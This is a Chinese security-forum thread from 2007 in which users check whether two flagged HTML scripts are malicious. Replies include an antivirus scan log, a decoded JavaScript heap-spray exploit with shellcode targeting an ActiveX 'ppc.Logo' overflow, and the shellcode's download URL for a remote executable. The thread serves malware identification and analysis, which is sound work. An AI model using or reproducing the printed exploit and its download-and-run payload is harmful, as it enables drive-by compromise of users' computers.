收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 两个脚本
12下一页
返回列表 发新帖
查看: 2495|回复: 15
收起左侧

两个脚本

[复制链接]
CZH
发表于 2007-9-18 18:49:54 | 显示全部楼层 |阅读模式
两个脚本
误报?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

promised
发表于 2007-9-18 18:52:07 | 显示全部楼层
并非误报
回复

举报

nosferatu
头像被屏蔽
发表于 2007-9-18 18:54:43 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\Download.rar'
C:\Documents and Settings\Administrator\桌面\Download.rar
  [0] Archive type: RAR
  --> 1.htm
      [DETECTION] Is the Trojan horse TR/Iframe.Z
  --> 2.htm
      [DETECTION] Contains detection pattern of the Java script virus JS/Agent.WA
      [INFO]      The file was deleted!
回复

举报

lsyer
发表于 2007-9-18 18:56:32 | 显示全部楼层
楼下来解密吧~
回复

举报

promised
发表于 2007-9-18 19:04:23 | 显示全部楼层
第一层
  1. var shellcode = unescape("%u00E8%u0000%u6A00%uEB03%u7E21%uE2D8%u9873%u8AFE%u8E0E%u0E4E%u55EC%u4C52%u4F4D%u004E%u3600%u2F1A%u6370%u5C3A%u2E63%u7865%u0065%u5F59%u67AF%uA164%u0030%u408B%u8B0C%u1C70%u8BAD%u0868%u8B51%u3C75%u748B%u782E%uF503%u8B56%u2076%uF503%uC933%u4149%u03AD%u33C5%u0FDB%u10BE%uF238%u0874%uCBC1%u030D%u40DA%uF1EB%u1F3B%uE775%u8B5E%u245E%uDD03%u8B66%u4B0C%u5E8B%u031C%u8BDD%u8B04%uC503%u59AB%uBCE2%u0F8B%uF980%u7463%u570A%uD0FF%uAF95%u6AAF%uEB01%u52AC%u5752%u8F8D%u10DB%u0040%uE981%u104E%u0040%u5251%uD0FF%u016A%uFF57%uEC57%u57FF%u90E8%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u6a64%u3737%u3838%u632e%u2f6e%u7070%u2e73%u7865%u0065");bigblock = unescape("%u9090");headersize = 20;slackspace = headersize + shellcode.length;while ( bigblock.length < slackspace ) bigblock += bigblock;fillblock = bigblock.substring(0, slackspace);block = bigblock.substring(0, bigblock.length - slackspace);while(block.length + slackspace < 0x40000) block = block + block + fillblock;memory = new Array();for (x=0; x< 400; x++) memory[x] = block + shellcode;var buffer = '\x0a';while (buffer.length < 500) buffer += '\x0a\x0a\x0a\x0a';ppc.Logo = buffer;
复制代码
回复

举报

CZH
 楼主| 发表于 2007-9-18 19:08:39 | 显示全部楼层
我这里还有一大堆脚本,都是逛论坛的结果
回复

举报

dikex
发表于 2007-9-18 22:13:46 | 显示全部楼层
原帖由 promised 于 2007-9-18 19:04 发表
第一层var shellcode = unescape("%u00E8%u0000%u6A00%uEB03%u7E21%uE2D8%u9873%u8AFE%u8E0E%u0E4E%u55EC%u4C52%u4F4D%u004E%u3600%u2F1A%u6370%u5C3A%u2E63%u7865%u0065%u5F59%u67AF%uA164%u0030%u408B%u8B0C%u1C70 ...



http://down.dj7788.cn/pps.exe

貌似见过不少此了
回复

举报

欠妳緈諨
发表于 2007-9-18 22:15:38 | 显示全部楼层
脚本,AVAST不感兴趣
回复

举报

solcroft
发表于 2007-9-18 22:28:10 | 显示全部楼层
原帖由 promised 于 2007-9-18 20:34 发表
第一层var shellcode = unescape("%u00E8%u0000%u6A00%uEB03%u7E21%uE2D8%u9873%u8AFE%u8E0E%u0E4E%u55EC%u4C52%u4F4D%u004E%u3600%u2F1A%u6370%u5C3A%u2E63%u7865%u0065%u5F59%u67AF%uA164%u0030%u408B%u8B0C%u1C70 ...

http://down.dj7788.cn/pps.exe
回复

举报

lovewei
发表于 2007-9-18 22:28:41 | 显示全部楼层
不是误报,解密出两个病毒文件出来

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-17 22:37 , Processed in 0.125422 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表